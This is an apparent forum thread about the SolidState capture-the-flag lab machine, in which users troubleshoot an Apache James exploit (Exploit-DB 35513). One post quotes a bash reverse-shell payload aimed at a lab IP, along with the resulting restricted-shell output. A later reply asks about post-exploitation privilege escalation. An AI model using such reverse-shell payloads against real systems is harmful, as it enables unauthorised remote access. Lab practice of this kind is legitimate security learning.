Hi,
I’m working on solidstate now, following the offical writeup and ippsec’s video. But I found the exploit 35513 doesn’t work anymore. I couldn’t get a reverse shell after ssh login use mindy, could anyone try it to see if the exploit still work?
I still can’t make it work. I just change the exploit 35513.py to use my own ip address "payload = ‘/bin/bash -i >& /dev/tcp/10.10.14.2/443 0>&1’ ", then execute it to deliver the payload, then use mindy ssh login to the machine, and get this garbage information but the shell never call back my nc listener:
Last login: Tue Aug 22 14:00:02 2017 from 192.168.11.142
-rbash: $‘\254\355\005sr\036org.apache.james.core.MailImpl\304x\r\345\274\317ݬ\003’: command not found
-rbash: L: command not found
-rbash: attributestLjava/util/HashMap: No such file or directory
-rbash: L
errorMessagetLjava/lang/String: No such file or directory
-rbash: L
lastUpdatedtLjava/util/Date: No such file or directory
-rbash: Lmessaget!Ljavax/mail/internet/MimeMessage: No such file or directory
-rbash: $‘L\004nameq~\002L’: command not found
-rbash: recipientstLjava/util/Collection: No such file or directory
-rbash: L: command not found
-rbash: $‘remoteAddrq~\002L’: command not found
-rbash: remoteHostq~LsendertLorg/apache/mailet/MailAddress: No such file or directory
-rbash: $‘\221\222\204m\307{\244\002\003I\003posL\004hostq~\002L\004userq~\002xp’: command not found
-rbash: $‘L\005stateq~\002xpsr\035org.apache.mailet.MailAddress’: command not found
-rbash: team@team.pl: No such file or directory
-rbash: 4054205.0.1543226381071.JavaMail.root@solidstate: No such file or directory
-rbash: MIME-Version:: command not found
-rbash: Content-Type:: command not found
-rbash: Content-Transfer-Encoding:: command not found
-rbash: Delivered-To:: command not found
-rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamStore: line 7: syntax error near unexpected token (' -rbash: /etc/bash_completion.d/4D61696C313534333232363338313034352D30.Repository.FileStreamSt're: line 7: Received: from 10.10.14.2 ([10.10.14.2])
the exploit worked for me, but for priv esv when i try to edit the file in vi, i get issues.
Vim: Warning: Output is not to a terminal
Vim: Warning: Input is not from a terminal
any thoughts on getting around this?